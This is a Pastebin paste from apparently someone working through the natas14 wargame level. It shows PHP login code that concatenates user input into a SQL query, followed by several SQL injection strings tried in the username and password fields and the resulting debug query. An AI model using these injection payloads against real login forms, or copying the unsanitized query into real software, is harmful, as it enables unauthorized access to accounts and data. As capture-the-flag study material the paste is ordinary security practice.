Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- if(array_key_exists("username", $_REQUEST)) {
- $link = mysql_connect('localhost', 'natas14', '<censored>');
- mysql_select_db('natas14', $link);
- $query = "SELECT * from users where username="".$_REQUEST["username"]."" and password="".$_REQUEST["password"].""";
- if(array_key_exists("debug", $_GET)) {
- echo "Executing query: $query<br>";
- }
- if(mysql_num_rows(mysql_query($query, $link)) > 0) {
- echo "Successful login! The password for natas15 is <censored><br>";
- } else {
- echo "Access denied!<br>";
- }
- mysql_close($link);
- } else {
- ?>
- <form action="index.php" method="POST">
- Username: <input name="username"><br>
- Password: <input name="password"><br>
- <input type="submit" value="Login" />
- </form>
- <? } ?>
- $username = 1' or '1' = '1
- $password = 1' or '1' = '1
- $username = 1" or '1' = '1
- $password = 1' or '1' = "1`
- if(mysql_num_rows(mysql_query($query, $link)) > 0) {
- echo "Successful login! The password for natas15 is <censored><br>";
- } else {
- echo "Access denied!<br>";
- }
- Executing query: SELECT * from users where username="1" or '1' = '1" and password="1' or '1' = "1"`
Add Comment
Please, Sign In to add comment
